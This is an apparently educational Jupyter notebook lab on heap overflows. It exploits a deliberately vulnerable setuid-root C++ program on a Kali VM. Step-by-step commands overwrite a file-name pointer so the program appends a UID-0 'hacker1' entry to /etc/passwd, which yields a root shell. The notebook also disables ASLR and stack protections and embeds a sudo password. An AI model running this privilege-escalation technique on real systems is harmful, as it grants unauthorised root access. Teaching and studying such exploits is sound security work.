# Heap Overflow

## External Resources
- YouTube Video - [https://youtu.be/mIrccAWEM-g](https://youtu.be/mIrccAWEM-g)
- YouTube Podcast - [https://youtu.be/JD0HdE0yymA](https://youtu.be/JD0HdE0yymA)
- NotebookLM learning materials - [https://notebooklm.google.com/notebook/16c5cd02-4519-4055-af4e-68cb1e1c2979](https://notebooklm.google.com/notebook/16c5cd02-4519-4055-af4e-68cb1e1c2979)

## Overview
- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
    
## Heap Overflow
- heap overflow may not be as common as stack overflow but can be just as effective

### demos/heap_overflow/secret.cpp
- review the program and spot the following line that's susceptible 
```c++
strcpy(secret, argv[1]); // culprit!
```

In [7]:
%cd demos/heap_overflow

[Errno 2] No such file or directory: 'demos/heap_overflow'
/home/kali/projects/SystemSecurity/demos/heap_overflow


In [8]:
%pwd

'/home/kali/projects/SystemSecurity/demos/heap_overflow'

In [9]:
! cat secret.cpp

#include <iostream>
#include <string>
#include <cstdio>
#include <cstring>
#include <fstream>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()
#include <filesystem>

namespace fs = std::filesystem;
using namespace std;

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <secret to add to %s>\n", prog_name, filename);
   exit(0);
}

int main(int argc, char* argv[]) {
    int userid;
    char *secret, *secret_file;
    ofstream fout;
    
    secret = new char[100];
    secret_file = new char[20];


    strcpy(secret_file, "/var/secret");

    if (argc < 2)
        usage(argv[0], secret_file);
    
    strcpy(secret, argv[1]);

    printf("[DEBUG] secret      @ %p: \'%s\'\n", secret, secret);
    printf("[DEBUG] secret_file @ %p: \'%s\'\n", secret_file, secret_file);

    userid = getuid();
    fout.open(secret_file, ios_base::app); // append mode
    if (!fout) {
        cerr << "Error while opening file\n";
        cerr << "Make sure " << argv[0] << " h

In [10]:
! echo kali | sudo -S make

[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie secret.cpp  -o secret.exe 
# must run make with sudo to disable randomaize_va_space
echo 0 | tee /proc/sys/kernel/randomize_va_space
0
sudo chown root:root secret.exe 
sudo chmod +s secret.exe  


### secret.exe must be setuid root program 
- all users in the system can keep their own secret by writing to /var/secrets file

In [5]:
! ls -al secret.exe

-rwsr-sr-x 1 root root 216268 Apr 20 13:49 secret.exe


In [6]:
# run the program
! ./secret.exe

Usage: ./secret.exe <secret to add to /var/secret>


In [ ]:
# run the program with argument
! ./secret.exe "my top secret data"

In [ ]:
! ./secret.exe "new note for user"

In [ ]:
! echo kali | sudo -S cat /var/secret

## overflowing buffer by corrupting datafile
- how far down is secret_file from secret buffer (the offset)?
- use gdb
- subtract the address of secret buffer from the address of scret_file

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow]
└─$ sudo gdb -q ./secret.exe 
Reading symbols from ./secret.exe...

(gdb) break main
Breakpoint 1 at 0x804936a: file secret.cpp, line 21.

(gdb) run "some secret"
Starting program: /home/kali/projects/EthicalHacking/demos/heap_overflow/secret.exe "some secret"

Breakpoint 1, main (argc=2, argv=0xffffd614) at secret.cpp:21
21          ofstream fout;

(gdb) n
(gdb) n 
(gdb) p/x secret # secret is a pointer
$1 = 0x8051bb0

(gdb) p/x secret_file # secret file is a pointer
$2 = 0x8051c20
(gdb) 
```

In [ ]:
# the offset of secret_file from secret buffer is:
print(0x8051c20 - 0x8051bb0)

In [ ]:
! ./secret.exe $(python -c 'print("A"*112)')

In [ ]:
# let's make sure testfile doesn't exist in the current director
# delete the file if exists
#! rm -f testfile
! ls -al testfile

In [ ]:
! ./secret.exe $(python -c 'print("A"*112 + "testfile")')

In [ ]:
%%bash
ls -al testfile

In [ ]:
%%bash
echo kali | sudo -S cat testfile

## Exploit the heap overflow flaw
- several clever ways to exploit this type of capability
- One interesting one: append a user account to the `/etc/passwd` file
- make a backup copy of the file just incase...

In [ ]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [ ]:
%%bash
cat /tmp/passwd.bkup

## /etc/passwd file format

- Linux `/etc/passwd` file stores user account infor and hashed password using the following format:

`username:password:userid:groupid:User Info:home folder:default shell`

- x : hashed password stored in /etc/shadow file
- NOTE: the password field can also contain hashed password
- Python crypt module provides API to create Unix passwords with hash - [https://docs.python.org/3/library/crypt.html](https://docs.python.org/3/library/crypt.html)

```python
crypt("password", "salt")
```

In [ ]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "AA"))'

In [ ]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "XX"))'

## goal: generate a string that looks like

`username:XXq2wKiyI43A2:0:0:userinfo:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with `/bin/bash`
    - because the file name `/etc/passwd` will be automatically attached at the end
    - remember we're writing the whole string as a secret note to the file

### workaround:
- make `/etc/passwd` a soft link pointing to `/bin/bash`
- create the following string instead:

`username:XXq2wKiyI43A2:0:0:userinfo:/root:/tmp/etc/passwd`

- Note `/etc/passwd` must be over_written to the `secret_file` buffer

In [ ]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [ ]:
%%bash
ls -l /tmp/etc/passwd

### now we can create a valid password entry that looks like:

`hacker1:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### things to note
- the value just before `/etc/passwd` must be 112 bytes long, remember?
- can play with user information column to adjust the length

In [ ]:
%%bash
# find the length with empty user info
python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")'

In [ ]:
%%bash
# find the length with empty user info
python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' | wc -c

In [ ]:
112-37

In [ ]:
%%bash
python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp", end="")' | wc -c

In [ ]:
! ./secret.exe $(python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")')

In [ ]:
%%bash
echo kali | sudo -S tail /etc/passwd

## login or su 
- use newly created account (`hacker1:password`) to login

```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow]
└─$ su hacker1                                                                                        134 ⨯
Password: 
┌──(root💀K)-[/home/kali/projects/EthicalHacking/demos/heap_overflow]
└─# whomai         
```